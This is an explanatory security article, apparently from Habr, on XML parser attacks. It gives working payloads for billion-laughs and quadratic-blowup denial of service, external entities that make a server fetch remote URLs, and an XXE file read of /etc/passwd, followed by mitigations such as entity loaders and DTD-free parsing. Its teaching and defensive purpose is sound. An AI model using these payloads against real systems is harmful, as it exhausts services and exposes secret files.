How to make a bomb out of XML

A discussion of various vulnerabilities related to XML parsing was published on the oss-security mailing list. The vulnerabilities affect applications that let libraries process named and external entities in a DTD embedded in an XML document obtained from an untrusted source. That is, in effect, applications that do not change the default parser settings.

Examples of XML bombs follow. If you have applications that handle XML, you can check them for these vulnerabilities yourself. The bombs in this post were tested with the xmllint utility that ships with the libxml2 library, but other parsers can be used as well.

Theory

The XML standard lets a document use a DTD to define which combinations of nested tags and attributes are valid. The DTD can either be referenced as an external resource or be defined entirely within the document itself. An example of a document with an embedded DTD:

 <!DOCTYPE greeting [
   <!ELEMENT greeting (#PCDATA)>
 ]>
 <greeting>Hello, world!</greeting>

Besides elements and attributes, a DTD can also define entities. An example of a document that uses a named entity:

 <!DOCTYPE greeting [
   <!ENTITY target "world">
   <!ELEMENT greeting (#PCDATA)>
 ]>
 <greeting>Hello, &target;!</greeting>

You can validate this document and expand its entities as follows:

 $ xmllint --noent --valid hello.xml
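The same expansion can be observed outside xmllint. The following is a minimal sketch, assuming Python's standard xml.etree.ElementTree module with its default settings; the DOC constant and the greeting_text helper are names made up for this illustration.

```python
import xml.etree.ElementTree as ET

# The document from the example above, with one named entity in its DTD.
DOC = """<!DOCTYPE greeting [
  <!ENTITY target "world">
  <!ELEMENT greeting (#PCDATA)>
]>
<greeting>Hello, &target;!</greeting>"""


def greeting_text(document: str) -> str:
    """Parse the document with default settings and return the root's text."""
    root = ET.fromstring(document)
    return root.text


print(greeting_text(DOC))  # prints "Hello, world!"
```

No option had to be switched on for the entity to be expanded, which is why applications that keep the parser defaults are the ones at risk.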

Exponential entity expansion

Named entities can expand not only to character strings but also to sequences of other entities. The standard prohibits recursion, but it places no limit on the depth of nesting. This makes it possible to represent very long text strings compactly (much as archivers do) and forms the basis of the “billion laughs” attack, known since 2003.

 <!DOCTYPE bomb [
   <!ENTITY a "1234567890" >
   <!ENTITY b "&a;&a;&a;&a;&a;&a;&a;&a;">
   <!ENTITY c "&b;&b;&b;&b;&b;&b;&b;&b;">
   <!ENTITY d "&c;&c;&c;&c;&c;&c;&c;&c;">
   <!ELEMENT bomb (#PCDATA)>
 ]>
 <bomb>&d;</bomb>

Modern XML parsers contain protection against such an attack. For example, libxml2 by default refuses to parse this document, despite its strict compliance with the standard:

 $ xmllint --noent --valid bomb1.xml
 Entity: line 1: parser error : Detected an entity reference loop
 &c;&c;&c;&c;&c;&c;&c;&c;
 ^
 bomb1.xml:8: parser error : Detected an entity reference loop
 <bomb>&d;</bomb>
 ^

To see how much the document swells when its entities are expanded, you must explicitly disable the protection against this attack:

 $ xmllint --noent --valid --huge bomb1.xml | wc -c
 5344

Clearly, adding one more entity by analogy with those above inflates the output stream by roughly as many times as there are references to the previous entity in the new one, while the input document grows only by a number of bytes proportional to the number of references. That is, the size of the output character stream depends exponentially on the size of the input XML document.

A small XML document can thus cause disproportionately large consumption of resources (such as RAM and CPU time) merely to parse it into tags and character strings. This is a typical DoS attack, one that exploits the large gap between an algorithm's typical-case and worst-case complexity.
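The growth is easy to check with a little arithmetic. The sketch below only counts characters and parses nothing; expanded_chars is a helper name invented for this illustration, and the figures assume the same shape as bomb1.xml (a 10-character base entity and 8 references per level).

```python
def expanded_chars(base_len: int, fan_out: int, levels: int) -> int:
    """Characters produced by the top entity after `levels` nested levels,
    each of which references the previous entity `fan_out` times."""
    return base_len * fan_out ** levels


# bomb1.xml has three levels (b, c, d) above the 10-character entity a.
for levels in (3, 6, 9):
    print(levels, expanded_chars(10, 8, levels))
# 3 5120
# 6 2621440
# 9 1342177280
```

The 5120 characters for three levels account for most of the 5344 bytes reported by wc; the remainder is presumably the surrounding markup that xmllint prints along with the expanded text. Each additional level costs the attacker only one more short line in the DTD.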

Quadratic entity expansion

As we have already seen, some libraries counter the “billion laughs” attack by imposing a hard, artificial limit on the depth of the tree of named entities. Such a limit does prevent an exponential relationship between the size of the input XML file and the size of the output character stream. However, an attacker who wants to exhaust a server's resources with a relatively small XML document does not need an exponential relationship at all. A quadratic one will do just fine, and a single level of named entities is enough for it. We simply repeat one long entity many times:

 <!DOCTYPE bomb [
   <!ENTITY x "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx...x" >
   <!ELEMENT bomb (#PCDATA)>
 ]>
 <bomb>&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;...&x;</bomb>

 $ xmllint --huge --noent --valid bomb2.xml | wc -c
 1868

The --huge option is added in case your version of libxml2 treats this example as an attack. The library was taught to do so by this commit; at the time of writing, the change had not yet made it into a release.
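The quadratic relationship can also be checked with arithmetic alone. This is a rough sketch: the sizes helper is a made-up name, the fixed DTD boilerplate is ignored, and the input is assumed to be split evenly between the entity body and the references to it.

```python
REF = "&x;"  # one reference to the entity costs three input bytes


def sizes(entity_len: int, refs: int) -> tuple:
    """Return (approximate input bytes, expanded output characters)."""
    input_bytes = entity_len + refs * len(REF)
    output_chars = entity_len * refs
    return input_bytes, output_chars


# Spend the same number of bytes on the entity and on the references.
for half in (1_000, 10_000, 100_000):
    inp, out = sizes(half, half // len(REF))
    print(f"input ~{inp} bytes -> output {out} characters")
```

Under these assumptions, a tenfold increase in input size yields roughly a hundredfold increase in output: about 200 KB of input already expands to more than three billion characters.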

External entities

The XML standard allows entity values to come not only from literal strings but also from external resources, for example over HTTP. This lets an attacker who can reach the XML parser on a zombie server scan ports and even mount DoS attacks on other servers while hiding their own IP address. When parsed by a parser that supports external entities, the following XML file triggers three requests to Habr's RSS feeds:

 <!DOCTYPE bomb [
   <!ENTITY a1 SYSTEM "http://habrahabr.ru/rss/best/" >
   <!ENTITY a2 SYSTEM "http://habrahabr.ru/rss/hubs/" >
   <!ENTITY a3 SYSTEM "http://habrahabr.ru/rss/qa/" >
   <!ELEMENT author ANY>
   <!ELEMENT blockquote ANY>
   <!ELEMENT category ANY>
   <!ELEMENT channel ANY>
   <!ELEMENT code ANY>
   <!ELEMENT description ANY>
   <!ELEMENT generator ANY>
   <!ELEMENT guid ANY>
   <!ATTLIST guid isPermaLink CDATA #IMPLIED>
   <!ELEMENT h3 ANY>
   <!ELEMENT i ANY>
   <!ELEMENT image ANY>
   <!ELEMENT item ANY>
   <!ELEMENT language ANY>
   <!ELEMENT lastBuildDate ANY>
   <!ELEMENT link ANY>
   <!ELEMENT managingEditor ANY>
   <!ELEMENT pre ANY>
   <!ELEMENT pubDate ANY>
   <!ELEMENT rss ANY>
   <!ATTLIST rss version CDATA #IMPLIED>
   <!ELEMENT title ANY>
   <!ELEMENT url ANY>
   <!ELEMENT bomb ANY>
 ]>
 <bomb>&a1;&a2;&a3;</bomb>

 $ xmllint --noent --noout --load-trace bomb3.xml

In the example above, you can prevent the parser from reading entities from the network by passing the --nonet option.

In the same way, a vulnerable application can be forced to read local files containing secrets, such as a database password. Unfortunately, --nonet does not help here:

 <!DOCTYPE bomb [
   <!ENTITY passwd SYSTEM "file:///etc/passwd" >
   <!ELEMENT bomb (#PCDATA)>
 ]>
 <bomb>&passwd;</bomb>

 $ xmllint --noent --nonet --valid bomb4.xml

This type of attack is called XXE (from XML eXternal Entity). A recent example is a vulnerability in PostgreSQL, CVE-2012-3489.

Conclusion

Now let's talk about preventing such attacks.

Of course, you should use library versions that take countermeasures against these and other vulnerabilities. You should also explicitly limit the resources spent on parsing an XML document. With libxml2, for example, this can be done by calling xmlMemSetup() and passing your own memory management functions, which simply refuse to allocate too much. Access to external resources must be restricted as well, for example by writing your own entity loader.

There is, however, an opinion that all the measures listed above treat the symptoms rather than the root cause of these vulnerabilities. Indeed, why should your application parse an XML document according to the DTD referenced by (or contained in) that very document? Wouldn't it be more correct to parse the document according to your application's own rules? After all, you validate HTML form data against the regular expressions in the code of the form handler, not against ones that arrived along with the form data. Accordingly, a non-DTD (and therefore non-validating) XML parser, with the necessary entities loaded in advance, will be enough.
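One way to approximate such a non-DTD parser is to reject any document that carries a DOCTYPE declaration. The sketch below assumes Python's standard xml.parsers.expat module; DTDForbidden and text_without_dtd are names invented for this illustration, and a real application would build its own data structures instead of just collecting the text.

```python
from xml.parsers import expat


class DTDForbidden(ValueError):
    """Raised when a document contains a DOCTYPE declaration."""


def text_without_dtd(document: str) -> str:
    """Parse XML, refusing any DOCTYPE, and return its character data."""
    chunks = []
    parser = expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        # Called as soon as the parser sees "<!DOCTYPE"; abort right there,
        # before any entity declared in the DTD can be used.
        raise DTDForbidden(f"DOCTYPE {name!r} is not allowed")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.CharacterDataHandler = chunks.append
    parser.Parse(document, True)  # True marks the end of the input
    return "".join(chunks)


BOMB = '<!DOCTYPE bomb [ <!ENTITY a "1234567890"> ]><bomb>&a;</bomb>'

print(text_without_dtd("<greeting>Hello, world!</greeting>"))
try:
    text_without_dtd(BOMB)
except DTDForbidden as error:
    print("rejected:", error)
```

Because the exception is raised from the DOCTYPE handler, entity declarations, both internal and external, never get a chance to take effect. The price is that legitimate documents with a DTD are rejected too, which is exactly the trade-off argued for above.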

Source: https://habr.com/ru/post/170333/